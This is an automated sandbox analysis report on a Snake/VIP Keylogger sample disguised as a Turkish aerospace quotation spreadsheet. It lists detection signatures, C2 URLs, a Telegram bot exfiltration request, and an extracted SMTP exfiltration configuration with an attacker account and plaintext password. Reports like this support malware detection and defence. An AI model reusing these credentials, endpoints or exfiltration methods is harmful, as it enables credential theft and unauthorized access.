Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Overview

General Information

Sample name:TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
renamed because original name is a hash value
Original sample name:TEKLF STE - TUSA TRK HAVACILIK UZAY SANAY_xlsx.exe
Analysis ID:1576047
MD5:e984d47ddddd227739d93d4712eec8fa
SHA1:c10c8fbb4afc6d0ec5754ee95cfd4b3e4df4b3f8
SHA256:1349316e7a40b141bed9b55a8271d86434e168ff6efd248c1fa5af4e05c1c248
Tags:exegeoMassLoggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2daa0:$a1: get_encryptedPassword
        • 0x2e028:$a2: get_encryptedUsername
        • 0x2d713:$a3: get_timePasswordChanged
        • 0x2d82a:$a4: get_passwordField
        • 0x2dab6:$a5: set_encryptedPassword
        • 0x307d2:$a6: get_passwords
        • 0x30b66:$a7: get_logins
        • 0x307be:$a8: GetOutlookPasswords
        • 0x30177:$a9: StartKeylogger
        • 0x30abf:$a10: KeyLoggerEventArgs
        • 0x30217:$a11: KeyLoggerEventArgsEventHandler
        00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 16 entries
          SourceRuleDescriptionAuthorStrings
          2.2.RegSvcs.exe.770000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.RegSvcs.exe.770000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              2.2.RegSvcs.exe.770000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                2.2.RegSvcs.exe.770000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  2.2.RegSvcs.exe.770000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2dca0:$a1: get_encryptedPassword
                  • 0x2e228:$a2: get_encryptedUsername
                  • 0x2d913:$a3: get_timePasswordChanged
                  • 0x2da2a:$a4: get_passwordField
                  • 0x2dcb6:$a5: set_encryptedPassword
                  • 0x309d2:$a6: get_passwords
                  • 0x30d66:$a7: get_logins
                  • 0x309be:$a8: GetOutlookPasswords
                  • 0x30377:$a9: StartKeylogger
                  • 0x30cbf:$a10: KeyLoggerEventArgs
                  • 0x30417:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 15 entries
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-16T13:37:12.992245+010028033053Unknown Traffic192.168.2.849707104.21.67.152443TCP
                  2024-12-16T13:37:15.900329+010028033053Unknown Traffic192.168.2.849709104.21.67.152443TCP
                  2024-12-16T13:37:27.957196+010028033053Unknown Traffic192.168.2.849721104.21.67.152443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-16T13:37:08.701345+010028032742Potentially Bad Traffic192.168.2.849705193.122.130.080TCP
                  2024-12-16T13:37:11.373100+010028032742Potentially Bad Traffic192.168.2.849705193.122.130.080TCP
                  2024-12-16T13:37:14.279449+010028032742Potentially Bad Traffic192.168.2.849708193.122.130.080TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
                  Source: 2.2.RegSvcs.exe.770000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeReversingLabs: Detection: 34%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49706 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 192.168.2.8:49706 -> 104.21.67.152:443 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49709 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2
                  Source: Binary string: wntdll.pdbUGP source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1481254254.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1483312218.0000000003C30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1481254254.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1483312218.0000000003C30000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0100445A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0100C75C
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100C6D1 FindFirstFileW,FindClose,0_2_0100C6D1
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0100EF95
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0100F0F2
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0100F3F3
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_010037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_010037EF
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01003B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01003B12
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0100BCBC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0247F8E9h2_2_0247F644
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0247FD41h2_2_0247FA88

                  Networking

                  barindex
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:767668%0D%0ADate%20and%20Time:%2017/12/2024%20/%2011:29:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20767668%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
                  Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49708 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49705 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 104.21.67.152:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49709 -> 104.21.67.152:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49707 -> 104.21.67.152:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49706 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 192.168.2.8:49706 -> 104.21.67.152:443 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49709 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_010122EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_010122EE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:767668%0D%0ADate%20and%20Time:%2017/12/2024%20/%2011:29:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20767668%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 16 Dec 2024 12:37:35 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:767668%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000028C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enH
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000028BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
